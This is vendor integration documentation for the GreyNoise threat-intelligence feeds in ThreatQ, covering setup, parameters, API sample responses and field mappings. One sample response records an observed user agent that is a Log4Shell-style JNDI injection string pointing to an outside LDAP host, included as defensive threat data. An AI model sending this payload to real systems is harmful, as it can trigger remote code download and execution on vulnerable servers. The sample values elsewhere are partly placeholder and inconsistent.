Current ThreatQ Version Filter

GreyNoise CDF

The web format of this guide reflects the most current release. Guides for older iterations are available in PDF format.

Integration Details

ThreatQuotient provides the following details for this integration:

Current Integration Version

1.5.3

Compatible with ThreatQ Versions

>= 4.58.0

Support Tier

ThreatQ Supported

Introduction

GreyNoise collects, analyzes, and labels data on IPs that saturate security tools with noise. This unique perspective helps analysts waste less time on irrelevant or harmless activity, and spend more time focused on targeted and emerging threats.

The GreyNoise CDF provides the following feeds:

GreyNoise - ingests new, malicious IP Addresses every day. Additionally, a GNQL query can be provided to narrow down the results.
GreyNoise Enrichment - queries GreyNoise with IP Addresses from a Threat Collection and enriches those IP Addresses with the data that it ingests.

The following system object types are ingested by the integration:

Indicators
- Indicator Attributes
Tags

Installation

Perform the following steps to install the integration:

The same steps can be used to upgrade the integration to a new version.

Log into https://marketplace.threatq.com/.
Locate and download the integration file.
Navigate to the integrations management page on your ThreatQ instance.
Click on the Add New Integration button.
Upload the integration file using one of the following methods:
- Drag and drop the file into the dialog box
- Select Click to Browse to locate the integration file on your local machine
Select the feeds to install, when prompted, and click Install.
ThreatQ will inform you if the feed already exists on the platform and will require user confirmation before proceeding. ThreatQ will also inform you if the new version of the feed contains changes to the user configuration. The new user configurations will overwrite the existing ones for the feed and will require user confirmation before proceeding.
The feeds will be added to the integrations page. You will still need to configure and then enable the feed.

Configuration

ThreatQuotient does not issue API keys for third-party vendors. Contact the specific vendor to obtain API keys and other integration-related credentials.

To configure the integration:

Navigate to your integrations management page in ThreatQ.
Select the Commercial option from the Category dropdown (optional).
Click on the integration entry to open its details page.

Enter the following parameters under the Configuration tab:

GreyNoise Feed Configuration Parameters

Parameter Description

API Token Your GreyNoise API Token.

Last Seen Time Range The date the device was most recently observed by GreyNoise. You can use the keyword today or 1d to specify how many days to go back.

GNQL Query ThreatQuotient highly recommends utilizing this parameter to narrow down the ingested dataset. The field allows you to specify query arguments other than last_seen field, which is the default. See the https://docs.greynoise.io/reference/gnqlquery-1 documentation for instructions on how to build a GNQL query.

Attribute Filter

Select the pieces of context, attributes and tags, to ingest into the platform. Options include:

Tags (default)
Classification (default)
Malware Family (default)
Actor (default)
Category (default)
CVE (default)
Country
Country Code (default)
City
Destination Countries
Organization

Is TOR (default)
Is VPN (default)
Is Spoofable
Is Bot
VPN Service
Operating System
ASN
rDNS
Scanned Paths
Scanned Ports

Items per Page

The number of items to return per page from the GreyNoise API.

You should lower this value if you are encountering 400 errors when running the feed.

GreyNoise Enrichment Configuration Parameters

Parameter

Description

Data Collection Hash

The hash of the Data Collection to be enriched. This hash can be found in your Threat Library after loading the Data Collection. The hash will be in the browser's URL.

Example: https:// /threat-library#38d08c87b6e81a37a8591444f8c5dba5

API Token

Your GreyNoise API Token.

Attribute Filter

Select the pieces of context, attributes and tags, to ingest into the platform. Options include:

Tags (default)
Classification (default)
Malware Family (default)
Actor (default)
Category (default)
CVE (default)
Country
Country Code (default)
City
Destination Countries
Organization

Is TOR (default)
Is VPN (default)
Is Spoofable
Is Bot
VPN Service
Operating System
ASN
rDNS
Scanned Paths
Scanned Ports

GreyNoise Enrichment Configuration Screen

Review any additional settings, make any changes if needed, and click on Save.
Click on the toggle switch, located above the Additional Information section, to enable it.

ThreatQ Mapping

GreyNoise

The GreyNoise feed ingests new, malicious IP Addresses every day. Additionally, a GNQL query can be provided to narrow down the results.

GET https://api.greynoise.io/v2/experimental/gnql

Sample Response:

{
    "complete": false,
    "count": 23178,
    "data": [
        {
            "ip": "114.25.66.87",
            "seen": true,
            "classification": "malicious",
            "first_seen": "2019-07-28",
            "last_seen": "2019-07-28",
            "actor": "CRAZY PANDA23",
            "tags": [
                "SMB Scanner",
                "Eternalblue"
            ],
            "metadata": {
                "country": "Taiwan, Province of China",
                "country_code": "TW",
                "city": "Nankang",
                "organization": "Data Communication Business Group",
                "rdns": "114-25-66-87.dynamic-ip.hinet.net",
                "asn": "AS3462",
                "tor": false,
                "os": "Windows 7/8",
                "category": "isp",
                "region": "Brussels Capital",
                "destination_countries":["United Kingdom"]
            },
            "raw_data": {
                "scan": [
                    {
                        "port": 445,
                        "protocol": "TCP"
                    }
                ],
                "web": {
                    "paths": [
                        "/",
                        "/bootstrap/3.3.6/css/bootstrap.min.css"
                    ],
                    "useragents": [
                        "Hello, world",
                        "${jndi:ldap://179.43.175.101:1389/gm7unt}"
                    ]
                },
                "ja3": []
            },
            "cve": [
                  "CVE-2016-6277",
                  "CVE-2016-6563"
              ],
            "bot": true,
            "vpn": true,
            "vpn_service": "Express VPN",
            "spoofable": true
        }
    ],
  "message": "ok",
  "query": "classification:malicious AND last_seen:today",
  "scroll": "FGluY2x1ZGVfY29udGV4dF91dWlkDnF1ZXJ5VGhlbkZldGNoBRZ5Z1h5QmZvd1RhU0RaMEQxejhJRXN3AAAAAAuCRswWSjRhYklqMGpRVlctSkpCMllyS3EyQRZZb01USEV4LVJnLWVJc1BSTkE1NDV3AAAAAAsLldcWWVBucXpfcnhRU2E3QTNaWG1SWlBzURZhUTg4NDExS1FpYXdvcTNTdVktMm93AAAAAAjYxu0WMk85akRMUnlTZ3EwWmxDYzRtSnJDQRZ5Z1h5QmZvd1RhU0RaMEQxejhJRXN3AAAAAAuCRs0WSjRhYklqMGpRVlctSkpCMllyS3EyQRZZb01USEV4LVJnLWVJc1BSTkE1NDV3AAAAAAsLldgWWVBucXpfcnhRU2E3QTNaWG1SWlBzUQ=="
}

ThreatQuotient provides the following default mapping for this feed:

Feed Data Path	ThreatQ Entity	ThreatQ Object Type or Attribute Key	Published Date	Examples	Notes
`.data[].ip`	Related Indicator.Value	IP Address	`.data[].first_seen`	114.25.66.87	N/A
`.data[].actor`	Indicator.Attribute	Actor	`.data[].first_seen`	CRAZY PANDA	If this is 'unknown', it will be ignored
`.data[].cve[]`	Indicator.Attribute	N/A	`.data[].first_seen`	CVE-2016-6277	N/A
`.data[].tags[]`	Indicator.Tags	N/A	`.data[].first_seen`	Eternalblue	N/A
`.data[].classification`	Indicator.Attribute	Classification	`.data[].first_seen`	malicious	N/A
`.data[].metadata.country`	Indicator.Attribute	Country	`.data[].first_seen`	Taiwan, Province of China	N/A
`.data[].metadata.country_code`	Indicator.Attribute	Country Code	`.data[].first_seen`	TW	N/A
`.data[].metadata.city`	Indicator.Attribute	City	`.data[].first_seen`	Nankang	N/A
`.data[].metadata.destination_countries`	Indicator.Attribute	Destination Country	`.data[].first_seen`	United Kingdom	N/A
`.data[].metadata.region`	Indicator.Attribute	Region	`.data[].first_seen`	Brussels Capital	N/A
`.data[].metadata.organization`	Indicator.Attribute	Organization	`.data[].first_seen`	Data Communication Business Group	N/A
`.data[].metadata.asn`	Indicator.Attribute	ASN	`.data[].first_seen`	AS3462	N/A
`.data[].metadata.tor`	Indicator.Attribute	Is Tor	`.data[].first_seen`	true/false	This is converted to a Yes/No attribute value
`.data[].metadata.os`	Indicator.Attribute	Operating System	`.data[].first_seen`	Windows 7/8	N/A
`.data[].metadata.rdns`	Indicator.Attribute	FQDN	`.data[].first_seen`	114-25-66-87.dynamic-ip.hinet.net	N/A
`.data[].metadata. category`	Indicator.Attribute	Category	`.data[].first_seen`	isp	N/A
`.data[].raw_data. web.paths[]`	Indicator.Attribute	Scanned Path	`.data[].first_seen`	/bootstrap/3.3.6/css/bootstrap.min.css	N/A
`.data[].bot`	Indicator.Attribute	Is Bot	`.data[].first_seen`	Yes	Boolean -> Yes/No
`.data[].vpn`	Indicator.Attribute	Is VPN	`.data[].first_seen`	Yes	Boolean -> Yes/No
`.data[].spoofable`	Indicator.Attribute	Is Spoofable	`.data[].first_seen`	Yes	Boolean -> Yes/No
`.data[].vpn_service`	Indicator.Attribute	VPN Service	`.data[].first_seen`	Express VPN	N/A
`.data[].raw_data. scan.port[]`	Indicator.Attribute	Scanned Port	`.data[].first_seen`	445	N/A
`.data[].tags[]`	Indicator.Attribute	Malware Family	`.data[].first_seen`	Mirai	N/A

GreyNoise Enrichment (Feed)

The GreyNoise Enrichment feed enriches IP Addresses from a given Threat Collection with information from GreyNoise.

POST https://api.greynoise.io/v2/noise/multi/quick

If the response has "noise": true, then proceed to use the Context API endpoint on the IP Address.

If the response has "riot": true, then proceed to use the RIOT API endpoint on the IP Address.

Sample Response:

[
  {
    "ip": "186.33.111.236",
    "noise": true,
    "riot": false,
    "code": "0x01"
  },
  {
    "ip": "8.8.8.8",
    "noise": false,
    "riot": true,
    "code": "0x09"
  }
]

Context

POST https://api.greynoise.io/v2/noise/multi/context

Sample Response:

{
  "data": [
    {
      "found": false,
      "ip": "186.3.111.236",
      "first_seen": "",
      "last_seen": "",
      "seen": false,
      "tags": null,
      "actor": "",
      "spoofable": false,
      "classification": "",
      "cve": null,
      "bot": false,
      "vpn": false,
      "vpn_service": "",
      "metadata": {
        "asn": "",
        "city": "",
        "country": "",
        "country_code": "",
        "organization": "",
        "category": "",
        "tor": false,
        "rdns": "",
        "os": ""
      },
      "raw_data": {
        "scan": [],
        "web": {},
        "ja3": [],
        "hassh": []
      }
    }
  ],
  "message": "ok",
  "results": 1
}

Riot

GET https://api.greynoise.io/v2/riot/{{value.ip}}

Sample Response:

{
  "ip": "8.8.8.8",
  "riot": true,
  "category": "public_dns",
  "name": "Google Public DNS",
  "description": "Google's global domain name system (DNS) resolution service.",
  "explanation": "Public DNS services are used as alternatives to ISP's name servers. You may see devices on your network communicating with Google Public DNS over port 53/TCP or 53/UDP to resolve DNS lookups.",
  "last_updated": "2021-11-24T19:42:13Z",
  "logo_url": "https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg",
  "reference": "https://developers.google.com/speed/public-dns/docs/isp#alternative",
  "trust_level": "1"
}

ThreatQ provides the following default mapping for this feed:

Feed Data Path	ThreatQ Entity	ThreatQ Object Type or Attribute Key	Published Date	Examples	Notes
`.data[].ip`	Related Indicator.Value	IP Address	`data[].first_seen`	`114.25.66.87`	N/A
`.data[].actor`	Indicator.Attribute	N/A	`data[].first_seen`	`Google`	If 'Actor (Not APTs)' user config is checked. If this is 'unknown', it will be ignored
`.data[].tags[]`	Indicator.Tags	N/A	N/A	`Eternalblue`	If 'Tags' user config is checked
`.data[].classification`	Indicator.Attribute	Classification	`data[].first_seen`	`malicious`	If 'Classification' user config is checked. For this feed, this will always be 'malicious'
`.data[].cve[]`	Indicator.Attribute	CVE	`data[].first_seen`	N/A	If 'CVE' user config is checked
`.data[].metadata.rdns`	Indicator.Attribute	rDNS	`data[].first_seen`	`114-25-66-87.dynamic-ip.hinet.net`	If 'rDNS' user config is checked
`.data[].metadata.country`	Indicator.Attribute	Country	`data[].first_seen`	`Taiwan, Province of China`	If 'Country' user config is checked
`.data[].metadata.country_code`	Indicator.Attribute	Country Code	`data[].first_seen`	`TW`	If 'Country Code' user config is checked
`.data[].metadata.city`	Indicator.Attribute	City	`data[].first_seen`	`Nankang`	If 'City' user config is checked
`.data[].metadata.destination_countries`	Indicator.Attribute	Destination Country	`.data[].first_seen`	United Kingdom	N/A
`.data[].metadata.organization`	Indicator.Attribute	Organization	`data[].first_seen`	`Data Communication Business Group`	If 'Organization' user config is checked
`.data[].metadata.asn`	Indicator.Attribute	ASN	`data[].first_seen`	`AS3462`	If 'ASN' user config is checked
`.data[].metadata.tor`	Indicator.Attribute	Is Tor	`data[].first_seen`	`true/false`	If 'Is TOR' user config is checked. This is converted to a yes/no
`.data[].metadata.os`	Indicator.Attribute	Operating System	`data[].first_seen`	`Windows 7/8`	If 'Operating System' user config is checked
`.data[].metadata.category`	Indicator.Attribute	Category	`data[].first_seen`	`isp`	If 'Category' user config is checked
`.data[].raw_data.web.paths[]`	Indicator.Attribute	Scanned Path	`data[].first_seen`	`/bootstrap/3.3.6/css/bootstrap.min.css`	If 'Scanned Paths' user config is checked.
`.data[].bot`	Indicator.Attribute	Is Bot	`data[].first_seen`	`Yes`	If 'Is Bot' user config is checked. Boolean -> Yes/No
`.data[].vpn`	Indicator.Attribute	Is VPN	`data[].first_seen`	`Yes`	If 'Is VPN' user config is checked. Boolean -> Yes/No
`.data[].spoofable`	Indicator.Attribute	Is Spoofable	`data[].first_seen`	`Yes`	If 'Is Spoofable' user config is checked. Boolean -> Yes/No
`.data[].vpn_service`	Indicator.Attribute	VPN Service	`data[].first_seen`	`Express VPN`	If 'VPN Service' user config is checked.
`.data[].name`	Indicator.Attribute	Name	`data[].first_seen`	`Google Public DNS`	N/A
`.data[].code`	Indicator.Attribute	Noise Code	`data[].first_seen`	`This IP was found in RIOT`	N/A
`.data[].trust_level`	Indicator.Attribute	Trust Level	`data[].first_seen`	`Trustworthy`	N/A
`.data[].reference`	Indicator.Attribute	Reference	`data[].first_seen`	`https://developers.google.com/speed/public-dns/docs/isp#alternative`	N/A
`.data[].explanation`	Indicator.Attribute	Explanation	`data[].first_seen`	`Public DNS services are used as alternatives to ISP's name servers...`	N/A
`.data[].description`	Indicator.Attribute	Description	`data[].first_seen`	`Google's global domain name system (DNS) resolution service.`	N/A
`.data[].tags[]`	Indicator.Attribute	Malware Family	`data[].first_seen`	`Mirai`	If 'Malware' user config is checked

Average Feed Run

Object counts and Feed runtime are supplied as generalities only - objects returned by a provider can differ based on credential configurations and Feed runtime may vary based on system resources and load.

GreyNoise

Metric	Result
Run Time	1 minute
Indicators	1,186
Indicator Attributes	25,097

GreyNoise Enrichment

Metric	Result
Run Time	1 minute
Indicators	80
Indicator Attributes	8,191

Known Issues / Limitations

The current implementation of GreyNoise feed will not prevent the timeout errors from occurring, but it will minimize them. Also, should the error occur, the integration will still ingest the information it has received up to that point. Users should include as many limiting search parameters as they can in order to prevent any timeout errors they might encounter from the Greynoise API.

Change Log

Version 1.5.3
- Resolved an issue where users would encounter a Error creating objects from threat data error with the GreyNoise feed when first_seen contained an empty string.
Version 1.5.2
- Added the ability to ingest the Destination Country attribute.
Version 1.5.1
- Added the GreyNoise feed back into the integration.
- The user agent has been updated to be unique for each feed.
Version 1.5.0
- Added configuration field, Attribute Filter, that allows you to select which context is ingested into the ThreatQ platform.
- Resolved an issue where certain attributes would only be ingested if the vpn attribute existed.
- Lowered the default limit parameter to prevent hitting pagination scroll ID timeouts. The parameter is now configurable from the configuration page: Items per Page.
- Updated the minimum ThreatQ version to 4.58.0.
- Fixed typo for the rDNS attribute (was RDSN)
- Removed GreyNoise feed due to GreNoise limitations regarding large data ingestion
Version 1.4.0
- Improved integration performance by saving CVE, Malware, RDNS, and ASN as attributes.
- Removed the Ingest CVEs parameter from the configuration page.
Version 1.3.0
- Fixed a filter error with the GreyNoise Enrichment feed that would occur when GreyNoise did not return any enrichment data.
- Added a manual run option for the GreyNoise Enrichment feed.
Version 1.2.0
- Added new GreyNoise Enrichment feed.
- Add new user configuration fields for GreyNoise feed.
Version 1.1.0
- Added new user field.
- Added published date to all attributes.
- Added tags.
Version 1.0.1
- Limited the number of ingested paths attributes to 9000 to improve integration performance.
Version 1.0.0
- Initial Release

PDF Guides

Document	ThreatQ Version
GreyNoise CDF v1.5.3	4.58 or Greater
GreyNoise CDF v1.5.2	4.58 or Greater
GreyNoise CDF v1.5.1	4.58 or Greater
GreyNoise CDF v1.5.0	4.58 or Greater
GreyNoise CDF v1.4.0	4.35 or Greater
GreyNoise CDF v1.3.0	4.35 or Greater
GreyNoise CDF v1.2.0	4.35 or Greater
GreyNoise CDF v1.1.0	4.15 or Greater
GreyNoise CDF v1.0.1	4.15 or Greater
GreyNoise CDF v1.0.0	4.15 or Greater